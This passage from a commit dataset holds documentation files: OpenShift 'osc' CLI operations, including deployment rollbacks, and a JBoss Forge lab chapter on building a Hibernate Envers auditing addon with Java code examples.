Deployment:\n\tName:\t\tdocker-registry-1\n\tStatus:\t\tComplete\n\tSelector:\tdeployment=docker-registry-1,deploymentconfig=docker-registry,docker-registry=default\n\tLabels:\t\tdocker-registry=default\n\tReplicas:\t1 current \/ 1 desired\n\tPods Status:\t1 Running \/ 0 Waiting \/ 0 Succeeded \/ 0 Failed\n----\n====\n\n*Deployment Rollbacks*\n\nRollbacks revert an application to a previous deployment, and they include\nenvironment variables and volumes. Therefore, when deciding whether a rollback is\nviable or not, among other things, consider the following:\n\n- If security credentials have been recently updated, the previous deployment\nmay not have the correct values.\n- If the previous deployment used a custom strategy that is no longer available\nor usable, the rollback may not deploy correctly.\n\nDuring a rollback, only the configuration of pods and containers is changed by\ndefault, while the scaling or trigger settings remain unchanged.\n\nThe `-d` or `--dry-run` option shows the configuration of the updated deployment\nin an easy-to-read format without actually executing the rollback.
This allows\nyou to inspect the output before actually proceeding with the rollback.\n\nUse the `osc rollback` command to revert part of an application back to a\nprevious deployment:\n\n****\n`$ osc rollback _<deployment>_ [_<options>_]`\n****\n\n.Rollback CLI Configuration Options\n[cols=\"4,8\",options=\"header\"]\n|===\n\n|Option |Description\n\n.^|`--change-triggers`\n|Include the previous deployment's triggers in the rollback.\n\n.^|`--change-strategy`\n|Include the previous deployment's strategy in the rollback.\n\n.^|`-d, --dry-run`\n|Instead of performing the rollback, describe what the rollback will look like in human-readable form.\n\n.^|`-o, --output`\n|Instead of performing the rollback, print the updated deployment configuration in the specified format: `json`\\|`yaml`\\|`template`\\|`templatefile`.\n\n.^|`-t, --template`\n|Template string or path to template file to use when `-o=template` or `-o=templatefile`.\n|===\n\nTo perform a rollback:\n\n====\n\n----\n$ osc rollback deployment-1\n----\n====\n\nTo see what the rollback will look like without performing the rollback:\n\n====\n\n----\n$ osc rollback deployment-1 --dry-run\n----\n====\n\nTo perform the rollback manually by piping the *JSON* of the new configuration back to `osc`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc rollback deployment-1 --output=json | osc update deploymentConfigs deployment -f -\n----\n====\n","old_contents":"= CLI Operations\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nThis topic provides information on some general CLI operations and their syntax.\nYou must link:get_started_cli.html[setup and login] with the CLI before you can\nperform these operations.\n\n== Common Operations\nThe CLI allows interaction with the various objects that are managed by\nOpenShift. Many common `osc` operations are invoked using the following syntax:\n\n****\n`$ osc _<action>_ _<object_type>_ _<object_name_or_id>_`\n****\n\nThis specifies:\n\n- An `_<action>_` to perform, such as `get` or `describe`.\n- The `_<object_type>_` to perform the action on, such as `service` or the abbreviated `svc`.\n- The `_<object_name_or_id>_` of the specified `_<object_type>_`.\n\nFor example, the `osc get` operation returns a complete list of services that\nare currently defined:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc get svc\nNAME LABELS SELECTOR IP PORT(S)\ndocker-registry docker-registry=default docker-registry=default 172.30.78.158 5000\/TCP\nkubernetes component=apiserver,provider=kubernetes <none> 172.30.0.2 443\/TCP\nkubernetes-ro component=apiserver,provider=kubernetes <none> 172.30.0.1 80\/TCP\n----\n====\n\nThe `osc describe` operation can then be used to return detailed information\nabout a specific object:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe svc docker-registry\nName:\t\t\tdocker-registry\nLabels:\t\t\tdocker-registry=default\nSelector:\t\tdocker-registry=default\nIP:\t\t\t172.30.78.158\nPort:\t\t\t<unnamed>\t5000\/TCP\nEndpoints:\t\t10.1.0.2:5000\nSession Affinity:\tNone\nNo events.\n----\n====\n\nThe following table describes common `osc` operations and their general syntax:\n\n.Common CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`get`\n|`osc get _<object_type>_ _<object_name_or_id>_`\n|Returns a list of objects for the specified link:#object-types[object type]. 
If the optional `_<object_name_or_id>_` is included in the request, then the list of results is filtered by that value.\n\n|`describe`\n|`osc describe _<object_type>_ _<object_id>_`\n|Returns information about the specific object returned by the query; a specific `_<object_name_or_id>_` must be provided. The actual information that is available varies as described in link:#object-types[object type].\n\n|`create`\n|`osc create -f _<file_or_directory_path>_`\n|Parses a configuration file and creates one or more OpenShift objects based on the file contents. The `-f` flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc create` iterates through each one, creating the objects described in all of the indicated files. Any existing resources are ignored.\n\n|`update`\n|`osc update -f _<file_or_directory_path>_`\n|Attempts to modify an existing object based on the contents of the specified configuration file. The -f flag can be passed multiple times with different file or directory paths. When the flag is passed multiple times, `osc update` iterates through each one, updating the objects described in all of the indicated files.\n\n|`delete`\na|`osc delete -f _<file_path>_`\n\n`osc delete _<object_type>_ _<object_name_or_id>_`\n\n`osc delete _<object_type>_ -l _<label>_`\n\n`osc delete all -l _<label>_`\n.^|Deletes the specified OpenShift object. An object configuration can also be passed in through STDIN. The `osc delete all -l _<label>_` operation deletes all objects matching the specified `_<label>_`.\n\n|`log`\n|`osc log -f _<pod_name>_ _<container_name>_`\n|Retrieves the log output for a specific pod or container. This command does not work for other object types.\n|===\n\n== Object Types\nThe CLI supports the following object types, some of which have abbreviated\nsyntax:\n\n.Supported Object Types\n[options=\"header\"]\n|===\n\n|Object Type |Abbreviated Version\n\n|`build` |\n|`buildConfig` | `bc`\n|`deploymentConfig` | `dc`\n|`imageStream` | `is`\n|`imageStreamTag` | `istag`\n|`imageStreamImage` | `isimage`\n|`event` |`ev`\n|`minion` |`mi`\n|`pod` |`po`\n|`replicationController` |`rc`\n|`service` |`svc`\n|===\n\n== Project Operations\nThese advanced operations for administrators are used to define and instantiate\nOpenShift objects at the project level.\n\nThe simplest way to create a new project is:\n\n****\n`$ osadm new-project _<project_name>_ --display-name=_<display_name>_ --description=_<description>_ --admin=_<admin_username>_ --node-selector=_<node_label_selector>_`\n****\n\nThe following example creates a new project called `test` that appears in the\nManagement Console as \"Openshift 3 Sample\", with `test-admin` as the project\nadmin and launches any pods onto nodes matching label `environment : test`.\n\n====\n\n[options=\"nowrap\"]\n----\n$ osadm new-project test --display-name=\"OpenShift 3 Sample\" --description=\"This is an example project to demonstrate OpenShift v3\" --admin=anypassword:test-admin --node-selector=\"environment=test\"`\n----\n====\n\n.Project CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`process`\n|`osc process -f _<template_file_path>_`\n|Transforms a project template into a project configuration file.\n\n|`apply`\n|`osc apply -f _<config_file_path>_`\n|Creates all of the OpenShift objects for a given project based on the specified configuration file.\n|===\n\n== Build Operations\nOne of the fundamental capabilities of OpenShift is the 
ability to build\napplications into a container from source. The following table describes the CLI\noperations for working with application builds.\n\n.Build CLI Operations\n[cols=\".^2,.^5,8\",options=\"header\"]\n|===\n\n|Operation |Syntax |Description\n\n|`start-build`\n|`osc start-build _<buildConfig_name>_`\n|Manually starts the build process with the specified build configuration file.\n\n|`start-build`\n|`osc start-build --from-build=_<build_name>_`\n|Manually starts the build process by specifying the name of a previous build as a starting point.\n\n|`start-build`\na|`osc start-build _<buildConfig_name>_ --follow`\n\n`osc start-build --from-build=_<build_name>_ --follow`\n|Manually starts the build process by specifying either a configuration file pr the name of a previous build _and_ retrieves its build logs.\n\n|`cancel-build`\n|`osc cancel-build _<build_name>_`\n|Stops a build that is in progress.\n\n|`build-logs`\n|`osc build-logs _<build_name>_`\n|Retrieves the build logs for the specified build.\n|===\n\n== Deployment Operations\nOpenShift provides CLI access to inspect and manipulate\nlink:..\/dev_guide\/deployments.html[deployment configurations] using standard\n`osc` resource operations such as `get`, `create`, and `describe`.\n\nUse the `osc describe` command to describe a deployment configuration in\nhuman-readable form:\n\n****\n`$ osc describe dc _<deployment_config>_`\n****\n\nThe following example describes a deployment configuration called\n`docker-registry`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc describe dc docker-registry\nName:\t\tdocker-registry\nCreated:\t18 hours ago\nLabels:\t\tdocker-registry=default\nLatest Version:\t1\nTriggers:\tConfig\nStrategy:\tRecreate\nTemplate:\n\tSelector:\tdocker-registry=default\n\tReplicas:\t1\n\tContainers:\n\t\tNAME\t\tIMAGE\t\t\t\t\tENV\n\t\tregistry\topenshift\/origin-docker-registry:v0.4.3\tOPENSHIFT_CA_DATA=[omitted for space],OPENSHIFT_MASTER=https:\/\/10.245.2.2:8443\nLatest Deployment:\n\tName:\t\tdocker-registry-1\n\tStatus:\t\tComplete\n\tSelector:\tdeployment=docker-registry-1,deploymentconfig=docker-registry,docker-registry=default\n\tLabels:\t\tdocker-registry=default\n\tReplicas:\t1 current \/ 1 desired\n\tPods Status:\t1 Running \/ 0 Waiting \/ 0 Succeeded \/ 0 Failed\n----\n====\n\n*Deployment Rollbacks*\n\nRollbacks revert an application back to a previous deployment, and they include\nenvironment variable and volumes. Therefore, when deciding whether a rollback is\nviable or not, among other things, consider the following:\n\n- If security credentials have been recently updated, the previous deployment\nmay not have the correct values.\n- If the previous deployment used a custom strategy which is no longer available\nor usable, the deployment may not be deployed correctly.\n\nDuring a rollback, only the configuration of pods and containers is changed by\ndefault, while the scaling or trigger settings remain unchanged.\n\nThe `-d` or `--dry run` option shows the configuration of the updated deployment\nin an easy to read format without actually executing the rollback. 
This allows\nyou to inspect the output before actually proceeding with the rollback.\n\nUse the `osc rollback` command to revert part of an application back to a\nprevious deployment:\n\n****\n`$ osc rollback _<deployment>_ [_<options>_]`\n****\n\n.Rollback CLI Configuration Options\n[cols=\"4,8\",options=\"header\"]\n|===\n\n|Option |Description\n\n.^|`--change-triggers`\n|Include the previous deployment's triggers in the rollback.\n\n.^|`--change-strategy`\n|Include the previous deployment's strategy in the rollback.\n\n.^|`-d, --dry-run`\n|Instead of performing the rollback, describe what the rollback will look like in human-readable form.\n\n.^|`-o, --output`\n|Instead of performing the rollback, print the updated deployment configuration in the specified format: `json`\\|`yaml`\\|`template`\\|`templatefile`.\n\n.^|`-t, --template`\n|Template string or path to template file to use when `-o=template` or `-o=templatefile`.\n|===\n\nTo perform a rollback:\n\n====\n\n----\n$ osc rollback deployment-1\n----\n====\n\nTo see what the rollback will look like without performing the rollback:\n\n====\n\n----\n$ osc rollback deployment-1 --dry-run\n----\n====\n\nTo perform the rollback manually by piping the *JSON* of the new configuration back to `osc`:\n\n====\n\n[options=\"nowrap\"]\n----\n$ osc rollback deployment-1 --output=json | osc update deploymentConfigs deployment -f -\n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1770328f8e9e867282c292802b16dc144742eefb","subject":"Update developing.adoc","message":"Update developing.adoc","repos":"agoncal\/docs,forge\/docs,addonis1990\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,luiz158\/docs","old_file":"tutorials\/forge-hol\/docs\/chapters\/developing.adoc","new_file":"tutorials\/forge-hol\/docs\/chapters\/developing.adoc","new_contents":"== Developing Forge\n\n\n=== Developing a web application in a few seconds\n\nDownload the script https:\/\/github.com\/forge\/docs\/blob\/master\/tutorials\/forge-hol\/script\/generate.fsh\n\n=== Developing Hibernate Envers addon\n\nhttp:\/\/envers.jboss.org\/[Hibernate Envers] is a Hibernate core module that enables auditing of persistence classes.\nIf you want to audit the history of all the changes made to a certain entity or one of its fields during the web\napplication runtime, you just need to annotate it with `@Audited`. Envers will create a separate table for each such\nentity, which will hold the changes made to it. +\n\nIn this lab we will develop a Forge addon with the following features:\n\n* Set up Envers for the current project by adding its dependency to the POM\n* Enable auditing an entity by adding the `@Audited` annotation at the class level\n\n==== Creating a new Forge addon\n\nCreating a new Forge addon is similar to creating any other new project. You can do it manually, you can copy\nand modify an existing project of the same type or you can use a wizard to do it for you. We would certainly recommend\nusing Forge to help you bootstrap everything for several reasons. It knows exactly which dependencies and artifacts\nyou need to start, so you will not miss anything. Forge will also not create any garbage in your new project. +\n\nBefore creating the Envers addon, you need to start Forge. Please make sure that you have followed the instructions\nin <<installing-forge>> before that.
You can create a new addon if you run the following command in the Forge CLI: +\n\n[source, console]\n----\nproject-new --named envers --type addon --topLevelPackage org.jboss.forge.addon --addons org.jboss.forge.addon:javaee,2.12.0.Final\n----\n\nIf you run Forge from JBDS, open the Forge wizard (Ctrl + 4 or CMD + 4 on Mac), then select _Project: New_ and specify\n_envers_ as project name, _org.jboss.forge.addon_ as top level package, enter project location per your preference and\nas a Project type select _Forge Addon_:\n\nimage::developing\/forge-new-project.png[title=\"Creating new addon project\"]\n\nThis will create an empty Maven project that has the following artifacts (the resulting layout is sketched below):\n\n* *pom.xml* where the top level package is the group ID and the project name is the artifact ID. Besides the minimum\nForge dependencies, the command will also add those that you have specified with the `--addons` option in the format\n<group-id>:<artifact-id>,<version>\n* *Standard Maven directory structure* plus the top level package\n* *Empty +beans.xml+* in the +src\/main\/resources\/META-INF+ directory. This is because Forge and its addons strongly\nrely on the CDI development model\n* *README.asciidoc* file with a standard skeleton for documenting Forge addons
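\n\nPut together, the generated project looks roughly like this (a sketch based on the artifacts listed above; a `src\/test` branch may also be present):\n\n----\nenvers\n|-- pom.xml\n|-- README.asciidoc\n`-- src\n    `-- main\n        |-- java\n        |   `-- org\/jboss\/forge\/addon\n        `-- resources\n            `-- META-INF\n                `-- beans.xml\n----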
\n\n==== Developing the \"Envers: Setup\" command\n\nThe first command that we are going to create will set up Envers for a project. This basically means that the command\nwill simply add the Envers library dependency to the current project POM. As with the new Forge addon, we can manually\nwrite the command class, copy and modify an existing command or let Forge itself generate it for us. Here we will go\nfor the third option.\n\nIf you are running from the command line interface, type in: +\n\n[source, console]\n----\naddon-new-ui-command --named EnversSetupCommand --commandName \"Envers: Setup\" --categories \"Auditing\"\n----\n\nWhile from the JBDS, after opening the Forge wizard (Ctrl + 4 or CMD + 4 on Mac), you should choose _Addon: New UI Command_\nand enter _EnversSetupCommand_ in the Type Name field, _Envers: Setup_ in the Command name field and add _Auditing_ to\nthe Categories list box: +\n\nimage::developing\/forge-envers-setup-command.png[title=\"Creating _Envers: Setup_ command\"]\n\nThis will generate the `EnversSetupCommand` class in the `org.jboss.forge.addon.commands` package (unless you explicitly\nspecified otherwise). Forge makes this class extend `AbstractUICommand`, which provides some basic functionality\nlike configuring the command name, the command dialog and the command execution. We will go through these in this and\nthe next few sections. +\n\nThe `getMetadata()` method should be already implemented by Forge:\n\n[source, java]\n----\n   @Override\n   public UICommandMetadata getMetadata(UIContext context)\n   {\n      return Metadata.forCommand(EnversSetupCommand.class).name(\n            \"Envers: Setup\").category(Categories.create(\"Auditing\"));\n   }\n----\n\nThis will basically create a command that can be called _envers-setup_ from the CLI (note the substitution of colons and\nspaces by hyphens) and as _Envers: Setup_ in the _Auditing_ category in the Forge wizard: +\n\nimage::developing\/forge-envers-setup-command-wizard.png[title=\"_Envers: Setup_ command in the _Auditing_ category\"]\n\nAs the newly created command will not require any input from the user, we will leave the `initializeUI` method empty.\nHowever, in order to implement the command execution, we will need to change our class a little bit. More precisely, we\nwill have to extend from another abstract command class. The rationale behind this is that we want to update the\n*current* project POM. Extending `AbstractProjectCommand` instead of `AbstractUICommand` will give us some handy\nmethods to access and manipulate the project configuration:\n\n[source, java]\n----\npublic class EnversSetupCommand extends AbstractProjectCommand\n{\n----\n\nWe will have to implement two more abstract methods coming from this parent class:\n\n[source, java]\n----\n   @Override\n   protected boolean isProjectRequired() \n   {\n      return true;\n   }\n\n   @Inject\n   private ProjectFactory projectFactory;\n\n   @Override\n   protected ProjectFactory getProjectFactory() \n   {\n      return projectFactory;\n   }\n----\n\nAfter having specified _Envers: Setup_ as a project command, we can proceed to implementing the `execute` method.\nUsually this is called when the user clicks Finish on the command dialog or, in our case where we don't require input,\nwhen the user selects the command from the Forge wizard. +\n\nAs we mentioned earlier, the command will have to add the Hibernate Envers dependency to the project. We are going to\nbuild the Forge representation of this dependency using the DependencyBuilder's utility methods:\n\n[source, java]\n----\n   @Override\n   public Result execute(UIExecutionContext context) throws Exception\n   {\n      Dependency dependency = \n            DependencyBuilder.create(\"org.hibernate\")\n            .setArtifactId(\"hibernate-envers\")\n            .setVersion(\"4.3.6.Final\")\n            .setScopeType(\"provided\");\n   }\n\n----\n\nSpeaking in Maven terms, this is a dependency on the artifact with ID +hibernate-envers+, coming from the +org.hibernate+\ngroup, having version 4.3.6.Final and going into the project's _provided_ scope. +\n\nAfter we have specified our dependency, we will have to add it to the project model. For that purpose we will use the\n`DependencyInstaller` utility, coming from the projects addon:\n\n[source, java]\n----\n   @Inject\n   private DependencyInstaller dependencyInstaller;\n----\n\nForge 2.0 is based on a modular runtime called _Furnace_. The core of Furnace itself is not bound to any development model,\nso the addons can decide which of the Furnace implementations they want to use. We created our addon with the default\nconfiguration which enables the CDI development model. That is why, in the code snippet above, we asked Forge to provide\nus with the dependency installer for the current project build system. +\n\nNow it is time to install our dependency:\n\n[source, java]\n----\n   @Override\n   public Result execute(UIExecutionContext context) throws Exception\n   {\n      Dependency dependency =\n            DependencyBuilder.create(\"org.hibernate\")\n            .setArtifactId(\"hibernate-envers\")\n            .setVersion(\"4.3.6.Final\")\n            .setScopeType(\"provided\");\n      dependencyInstaller.install(getSelectedProject(context), dependency);\n\n   }\n----\n\nWe are using here one of the helper methods provided by the `AbstractProjectCommand`: `getSelectedProject()`. +
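\n\nFor reference, the installed dependency corresponds to a POM fragment roughly like the following (a sketch assembled from the values passed to the `DependencyBuilder` above):\n\n[source, xml]\n----\n<dependency>\n   <groupId>org.hibernate<\/groupId>\n   <artifactId>hibernate-envers<\/artifactId>\n   <version>4.3.6.Final<\/version>\n   <scope>provided<\/scope>\n<\/dependency>\n----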
\n\nNow our job is done, so it is time to report what we did. We do it by returning the result:\n\n[source, java]\n----\n   @Override\n   public Result execute(UIExecutionContext context) throws Exception\n   {\n      Dependency dependency =\n            DependencyBuilder.create(\"org.hibernate\")\n            .setArtifactId(\"hibernate-envers\")\n            .setVersion(\"4.3.6.Final\")\n            .setScopeType(\"provided\");\n      dependencyInstaller.install(getSelectedProject(context), dependency);\n      return Results.success(\"Envers was successfully set up for the current project!\");\n   }\n----\n\nThis will result in a SUCCESS: message in the command line interface and a green popup in the JBDS after our command is\nexecuted. +\n\nNow that we have a command that enables Hibernate Envers, it is time to add another command that will turn on auditing\nfor a given JPA entity.\n\n==== Adding some UI with the \"Envers: Audit entity\" command\n\nWe will create the class for the new command in the same way that we created the one for \"Envers: Setup\": with the help\nof Forge. If you are running the CLI, then simply type:\n\n[source, console]\n----\naddon-new-ui-command --named EnversAuditEntityCommand --commandName \"Envers: Audit entity\" --categories \"Auditing\"\n----\n\nOr alternatively in the JBDS choose _Addon: New UI Command_, enter _EnversAuditEntityCommand_ in the Type Name field,\n_Envers: Audit entity_ in the Command name field and add _Auditing_ to the Categories list box: +\n\nimage::developing\/forge-envers-audit-entity-command.png[title=\"Creating _Envers: Audit entity_ command\"]\n\nThen open the newly created class and make it extend `AbstractProjectCommand` instead of `AbstractUICommand` and also\nadd the unimplemented methods the way you did it in the setup command. +\n\nThis command will have to receive as input the entity class that has to be audited. To achieve this, we need to do two\nthings:\n\n. Obtain and configure a `UIInput` object from Furnace\n. Add our input to the `UIBuilder` in the `initializeUI` method\n\nStarting from number one, we should add the following member field to our command class:\n\n[source, java]\n----\n   @Inject\n   @WithAttributes(label = \"Entity to audit\", required = true)\n   private UIInput<JavaResource> auditEntity;\n----\n\nHere we call our field `auditEntity`. This will automatically add a `--auditEntity` option to our command in the CLI.\nThe type of the field is `UIInput<JavaResource>`, which means a few things:\n\n* The JBDS integration will create a text box control for the audit entity, while the command line interface will expect\na single unbounded value\n* The type of the value for this option should be a file that represents a Java type (class, interface or enumeration)\n\nWe have also specified some additional attributes with the `@WithAttributes` annotation:\n\n* The `label` attribute tells Forge's JBDS integration to override the field name (`auditEntity` in this case) with\n_Entity to audit_. This will be the actual label of the text box in the IDE. This will not, however, change the option\nname on the command line\n* The `required` attribute will not let the user complete the dialog without entering a value for the entity. The well\nknown asterisk character will be displayed along the label in JBDS
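\n\nOn the command line, the generated option would then be used along these lines (a sketch; the entity reference shown is hypothetical, and the exact value format depends on how the `JavaResource` is resolved):\n\n[source, console]\n----\nenvers-audit-entity --auditEntity org.example.model.Product\n----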
\n\nAfter we defined the input field, it is time to add it to the command dialog. In order to do that, we should edit the\n`initializeUI` method:\n\n[source, java]\n----\n   @Override\n   public void initializeUI(UIBuilder builder) throws Exception\n   {\n      builder.add(auditEntity);\n   }\n----\n\nWe can now tell Forge to show a _Browse_ button to the right of the input field, which will open the well known\ntype picker of Eclipse:\n\n[source, java]\n----\n   @Override\n   public void initializeUI(UIBuilder builder) throws Exception\n   {\n      auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n      builder.add(auditEntity);\n   }\n----\n\nIn Forge you can also set default values for a certain input. This way you can omit specifying its value on the command\nline and in the IDE it will be pre-filled in the command dialog. You can do that with the `setDefaultValue` method of the\n`UIInput`. In our case the UIInput is generified over the JavaResource class. So we'll have to check whether the current\nselection in the UI (being the CLI or JBDS) is a file that represents a Java type. If yes, we will set it as the default\nvalue of the text field:\n\n[source, java]\n----\n   @Override\n   public void initializeUI(UIBuilder builder) throws Exception\n   {\n      auditEntity.getFacet(HintsFacet.class).setInputType(InputType.JAVA_CLASS_PICKER);\n      Object selection = builder.getUIContext().getInitialSelection().get();\n      if (selection instanceof JavaResource)\n         auditEntity.setDefaultValue((JavaResource) selection);\n      builder.add(auditEntity);\n   }\n----\n\nNow the UI of the command is ready. We can go on and implement the `execute` method. First we should get the value\nentered in the text field and convert it to `JavaResource`. Then we will extract the `JavaClassSource` out of it so\nthat we can manipulate things like annotations:\n\n[source, java]\n----\n   @Override\n   public Result execute(UIExecutionContext context) throws Exception\n   {\n      JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n      JavaClassSource javaClass = javaResource.getJavaType();\n\n   }\n----\n\nNext we will check whether the chosen class already has the `Audited` annotation and, if not, will add it. At the\nend we'll save the new content and will return a successful result:\n\n[source, java]\n----\n   @Override\n   public Result execute(UIExecutionContext context) throws Exception\n   {\n      JavaResource javaResource = auditEntity.getValue().reify(JavaResource.class);\n      JavaClassSource javaClass = javaResource.getJavaType();\n      if (!javaClass.hasAnnotation(\"org.hibernate.envers.Audited\")) {\n         javaClass.addAnnotation(\"org.hibernate.envers.Audited\");\n      }\n      javaResource.setContents(javaClass);\n      return Results.success(\n            \"Entity \" + javaClass.getQualifiedName() + \" was successfully audited\");\n   }\n----
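\n\nTo make the effect concrete, after running the command against a (hypothetical) `Product` entity, its source would end up looking roughly like this:\n\n[source, java]\n----\nimport javax.persistence.Entity;\nimport javax.persistence.Id;\n\nimport org.hibernate.envers.Audited;\n\n@Audited\n@Entity\npublic class Product\n{\n   @Id\n   private Long id;\n\n   private String name;\n}\n----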
\n\nBut what if the user enters invalid input? This could be a file that does not exist, or is not a class or is not a JPA\nentity. We'll implement the `validate(UIValidationContext validator)` method to handle such situations. Whenever it\nfinds illegal input, it will add a validation error to the `validator` parameter. This will bring an error message if\nthe command executes in the CLI and in JBDS will disable the Finish button of the dialog, showing the error message in\nits well known location. This is how we implement the method:\n\n[source, java]\n----\n   @Override\n   public void validate(UIValidationContext validator)\n   {\n      super.validate(validator);\n      try\n      {\n         if (!auditEntity.getValue().reify(JavaResource.class).getJavaType()\n                  .hasAnnotation(Entity.class))\n         {\n            validator.addValidationError(auditEntity,\n                     \"The selected class has to be a JPA entity\");\n         }\n      }\n      catch (FileNotFoundException e)\n      {\n         validator.addValidationError(auditEntity,\n                  \"You must select an existing JPA entity to audit\");\n      }\n   }\n----\n\nFinally, we want to avoid some compilation errors in the project where we will run this command. So it should only be\navailable for execution if the user has called the setup command first, i.e. if the current project has a dependency on\nHibernate Envers. You can implement this enabling and disabling in several ways. We will show one of these: by\nimplementing the `isEnabled` method. There we will again obtain the `DependencyFacet` and will ask it whether the\ndesired dependency is installed. If this method returns false, the Forge commands wizard will not list the Audit entity\ncommand and it will not be available in the command completion in the CLI. This is the implementation:\n\n[source, java]\n----\n   @Override\n   public boolean isEnabled(UIContext context)\n   {\n      Dependency dependency = DependencyBuilder\n            .create(\"org.hibernate\")\n            .setArtifactId(\"hibernate-envers\");\n      return getSelectedProject(context).getFacet(DependencyFacet.class)\n            .hasEffectiveDependency(dependency);\n   }\n----\n\nOur first addon is ready. We can now build it, deploy it and run it on the Java EE project that we created in the\nbeginning of this chapter.\n\n==== Installing and trying the Envers addon\n\n==== Forge configuration and Forge command execution listeners\n\nIn this final section of this chapter we will show you some more features that you could use when developing Forge\naddons. In order to showcase those, we will add a new requirement to the envers addon. Suppose that, when setting it up,\nwe want to state that every new JPA entity we create should be automatically audited. This means that the\nEnvers: Setup command should be executable more than once, but it should add the Hibernate Envers dependency to the POM\nonly the first time it is executed. +\n\nSo, our first job is to enhance our setup command with UI in the form of a checkbox that asks the user whether they\nwant their JPA entities to be automatically auditable. We'll again use the familiar `UIInput` class, but this time\nwe'll generify it with Boolean. This will tell the IDE integration of Forge to automatically create a checkbox:\n\n[source, java]\n----\n   @Inject\n   @WithAttributes(label = \"Audit automatically new entities\",\n            description = \"Automatically make an entity auditable after it is created\")\n   private UIInput<Boolean> enableAutoAudit;\n----\n\nLet's now add the checkbox to the command dialog using the `UIBuilder`:\n\n[source, java]\n----\n   @Override\n   public void initializeUI(UIBuilder builder) throws Exception\n   {\n      builder.add(enableAutoAudit);\n   }\n----\n\nNext, we are going to make it possible to run the setup command numerous times without polluting our POM file with as\nmany dependencies to Hibernate Envers.
For that we are going to use something just as familiar, the `DependencyFacet`:\n\n[source, java]\n----\n   @Override\n   public Result execute(UIExecutionContext context) throws Exception\n   {\n      Dependency dependency = DependencyBuilder\n            .create(HIBERNATE_GROUP_ID)\n            .setArtifactId(ENVERS_ARTIFACT_ID)\n            .setVersion(\"4.3.6.Final\")\n            .setScopeType(\"provided\");\n      if (!getSelectedProject(context).getFacet(DependencyFacet.class)\n               .hasDirectDependency(dependency))\n      {\n         dependencyInstaller.install(getSelectedProject(context), dependency);\n      }\n\n      return Results.success(\"Envers was successfully set up for the current project!\");\n   }\n----\n\nFinally, we want to tell potentially other addons and commands whether or not the user wants to automatically add\nauditing to newly created JPA entities. For that we can use Forge's configuration. It is a file-based key-value-pair API,\nwhich can be used for storing project or Forge settings. The pairs are stored in a forge.xml file. Depending on whether the\nconfig concerns the project or Forge itself, it is located either in the project root directory (this is the only\nnon-project artifact that Forge creates) or under the ~\/.forge directory, respectively. +\n\nIn order to get hold of the project configuration, you need to ask the `ConfigurationFacet` for it:\n[source, java]\n----\n      Configuration config = getSelectedProject(context)\n               .getFacet(ConfigurationFacet.class)\n               .getConfiguration();\n----\n\nJust for the sake of completeness, the global Forge configuration is available through CDI injection:\n\n[source, java]\n----\n   @Inject\n   private Configuration config;\n----\n\nUsing the configuration API is as straightforward as using the `Hashtable` API, for example. We can add this line in the\n`execute` method just before the return statement:\n\n[source, java]\n----\n      config.setProperty(\"autoAudit\", enableAutoAudit.getValue());\n----\n\nNow, whenever and wherever we want to find whether the user has decided to automatically audit new JPA entities, we'll\njust need to look up the _autoAudit_ entry in the project configuration. +\n\nWe can furthermore enhance the UI of our command by reading the configuration upon building it and finding out what is\nthe current value of _autoAudit_. Based on that we can change the default value of our checkbox. For example, if the\nuser has already run the setup command and has checked the checkbox, the next time they run it, we want it checked\nrather than unchecked. As usual, we want to take care of the situation when the entry is not available at all, i.e. the\nproperty is null:\n\n[source, java]\n----\n      Configuration config = getSelectedProject(builder)\n               .getFacet(ConfigurationFacet.class)\n               .getConfiguration();\n      Object auditSettings = config.getProperty(AUTO_AUDIT_CONFIG_ENTRY);\n      enableAutoAudit.setDefaultValue(\n               auditSettings == null ? false : (Boolean) auditSettings);\n----\n","old_contents":"== Developing Forge\n\n\n=== Developing a web application in few seconds\n\n=== Developing Hibernate Envers addon\n\nhttp:\/\/envers.jboss.org\/[Hibernate Envers] is a Hibernate core module that enables auditing of persistence classes.\nIf you want to audit the history of all the changes made to a certain entity or one of its fields during the web\napplication runtime, you just need to audit that with `@Audited`. Envers will create a separate table for each such\nentity, which will hold the changes made to it.
+\n\nIn this lab we will develop a Forge addon with the following features:\n\n* Setup Envers for the following project by adding its dependency to the POM\n* Enable auditing an entity by adding the `@Audited` annotation on class level\n\n==== Creating a new Forge addon\n\nCreating a new Forge addon is similar to any new project that you want to create. You can do it manually, you can copy\nand modify an existing project of the same type or you can use a wizard to do it for you. We would certainly recommend\nusing Forge to help you bootstrap everything for several reasons. It knows what exactly which dependencies and artifacts\nyou need as a start so you will not miss anything. Forge will also not create any garbage in your new project. +\n\nBefore creating the Envers addon, you need to start Forge. Please make sure that you have followed the instructions\nin <<installing-forge>> before that. You can create a new addon if you run the following command in the Forge CLI: +\n\n[source, console]\n----\nproject-new --named envers --type addon --topLevelPackage org.jboss.forge.addon --addons org.jboss.forge.addon:javaee,2.12.0.Final\n----\n\nIf you run Forge from JBDS, open the Forge wizard (Ctrl + 4 or CMD + 4 on Mac) then select _Project: New_ and specify\n_envers_ as project name, _org.jboss.forge.addon_ as top level package, enter project location per your preference and\nas a Project type select _Forge Addon_:\n\nimage::developing\/forge-new-project.png[title=\"Creating new addon project\"]\n\nThis will create an empty Maven project that has the following artifacts:\n\n* *pom.xml* where the top level package is the group ID and the project name is the artifact ID. Besides the minimum\nForge dependencies, the command will add also those that you have specified with the `--addons` option in the format\n<group-id>:<artifact-id>,<version>\n* *Standard maven directory structure* plus the top level package\n* *Empty +beans.xml+* in the +src\/main\/resources\/META-INF+ directory. This is because Forge and its addons strongly\nrely on the CDI development model\n* *README.asciidoc* file with a standard skeleton for documenting Forge addons\n\n==== Developing the \"Envers: Setup\" command\n\nThe first command that we are going to create will set up 